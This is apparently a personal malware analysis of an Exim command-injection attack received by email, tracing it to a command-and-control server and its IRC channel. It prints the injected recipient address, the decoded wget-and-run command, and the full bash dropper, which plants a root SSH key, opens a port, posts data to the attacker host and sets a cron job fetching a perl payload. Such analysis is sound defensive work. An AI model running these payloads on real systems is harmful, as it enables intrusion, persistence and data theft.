Malware analysis
Initial infection
It started this morning. I received a mail from my mailserver that it couldn't deliver an email. It looked like a normal email, but the recipient was what triggered me. The mailadres had some command injection. After some searching on the internet I ended up in probably some old vulnerability in exim that made this possible. But let's take a look at the mailadres.
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>I replaced the "\x" for the "%" to parse it as URL decode. Changed some characters and I ended up with the following command. We got a C&C server! 45.148.10.84
/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"
Initial malware
The ss executable contains the next code:
#!/bin/bash
exists=$(grep -c "^jkl:" /etc/passwd)
if [ $exists -eq 0 ]; then
chattr -isa /root/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
/usr/sbin/sshd -p 322
/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables-save >/dev/null 2>&1
/usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables-save >/dev/null 2>&1
data2=`netstat -natp |grep sshd|base64`
wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
cd /tmp
echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
echo '* * * * * /tmp/twink' >mycron
crontab -l >> mycron
chmod +x /tmp/twink
crontab mycron;rm -fr mycron
else
exit
fi
This script will do the following:
- Checks it the user "jkl" exists. If so, stop executing the script.
- Add a public SSH key to the root user.
- Start a SSH server listening on port 322.
- Open the firewall for incoming and outgoing connection on port 322 and save it for reboots.
Show the current listening ports for the SSH server and send them in a POST request back to the C&C server.
Download a r.png file, run it trough perl and save it as the file twink.
- Put the downloaded script in the crontab and run it every minute.
IP research
Shodan
22
tcp
ssh
OpenSSHVersion: 5.3
SSH-2.0-OpenSSH_5.3
Key type: ssh-rsa
Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAvyWZgWstpcVr2blRlY/abtcMf0HAHITFE2ZPjZdu9ikzFFtf
AgJrdqEX1JoLXvXH+KpE9GYw+4H+J5/qVaBOmMUsCCZmZBdSgI5Va5ZXD2CcZD95JvpbB7w7Zr0Z
8M32GUPZrrnZY29ZSE0ZeMW6CvcXRH2rU+kEy8cHBaXZjPt6Ng3WXJR1JvVjqPeHQneyOtnw/pGZ
Yxxwyt8xa9ySoKN0dJOCJBKUhjtXmfH0OLHk9eUQUJ0A5r9F8qCW3JEZcPapfNTITF9rA3f57THC
+JuoTNxJgS883m/ljcWZJEeWi9IluUMb5ZDDSh+/EVlfhGHOUC6PJ6n8NHE/TrXqwQ==
Fingerprint: 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c
Kex Algorithms:
diffie-hellman-group-exchange-sha256
diffie-hellman-group-exchange-sha1
diffie-hellman-group14-sha1
diffie-hellman-group1-sha1
Server Host Key Algorithms:
ssh-rsa
ssh-dss
Encryption Algorithms:
aes128-ctr
aes192-ctr
aes256-ctr
arcfour256
arcfour128
aes128-cbc
3des-cbc
blowfish-cbc
cast128-cbc
aes192-cbc
aes256-cbc
arcfour
rijndael-cbc@lysator.liu.se
MAC Algorithms:
hmac-md5
hmac-sha1
umac-64@openssh.com
hmac-sha2-256
hmac-sha2-512
hmac-ripemd160
hmac-ripemd160@openssh.com
hmac-sha1-96
hmac-md5-96
Compression Algorithms:
none
zlib@openssh.com
80
tcp
http
Apache httpdVersion: 2.2.15
HTTP/1.1 403 Forbidden
Date: Sun, 29 Mar 2020 01:37:10 GMT
Server: Apache/2.2.15 (CentOS)
Accept-Ranges: bytes
Content-Length: 4961
Connection: close
Content-Type: text/html; charset=UTF-8
5432
tcp
postgresql
PostgreSQL
PostgreSQL
received invalid response to SSL negotiation: :
8080
tcp
http
Unreal ircd
:irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
:irc.evilcode.php NOTICE AUTH :*** Found your hostname (cached)
ERROR :Closing Link: [180.25.78.224] (HTTP command from IRC connection (ATTACK?))
9999
tcp
telnet
Unreal ircd
:irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
:irc.evilcode.php NOTICE AUTH :*** Found your hostname
Servers
IRCD server
[09:08:24] Connecting to [45.148.10.84] on port 8080 [09:08:24] Connection to host established [09:08:25] -irc.evilcode.php- *** Looking up your hostname... [09:08:25] -irc.evilcode.php- *** Couldn't resolve your hostname; using your IP address instead [09:08:25] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164 [09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6 [09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC [09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ [09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server [09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server [09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server [09:08:25] There are 1 users and 9 invisible on 1 servers [09:08:25] 1 operator(s) online [09:08:25] 4 channels formed [09:08:25] I have 10 clients and 0 servers [09:08:25] Current local users 10, max 232 [09:08:25] Current global users 10, max 232 [09:08:25] Message(422): MOTD File is missing [09:08:25] Guest55 sets mode +iwx
Only channel #R
[09:12:07] Guest55 (guest55@2E03481B.742B81C2.C80A0F0D.IP) joined the channel [09:12:07] Mode is +Mmnstu [09:12:18] evil has userhost fld@mfu.txt and real name “.” [09:12:18] evil is in @#R [09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!) [09:12:18] evil is a Network Administrator [09:12:18] evil is available for help. [09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds
[09:13:49] Connecting to [45.148.10.84] on port 9999 [09:13:49] Connection to host established [09:13:49] -irc.evilcode.php- *** Looking up your hostname... [09:13:49] -irc.evilcode.php- *** Couldn't resolve your hostname; using your IP address instead [09:13:49] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164 [09:13:49] Your host is irc.evilcode.php, running version Unreal3.2.10.6 [09:13:49] This server was created Sat Mar 7 2020 at 10:20:59 UTC [09:13:49] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ [09:13:49] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server [09:13:49] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server [09:13:49] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server [09:13:49] There are 1 users and 9 invisible on 1 servers [09:13:49] 1 operator(s) online [09:13:49] 1 unknown connection(s) [09:13:49] 4 channels formed [09:13:49] I have 10 clients and 0 servers [09:13:49] Current local users 10, max 232 [09:13:49] Current global users 10, max 232 [09:13:49] Message(422): MOTD File is missing [09:13:49] Guest55 sets mode +iwx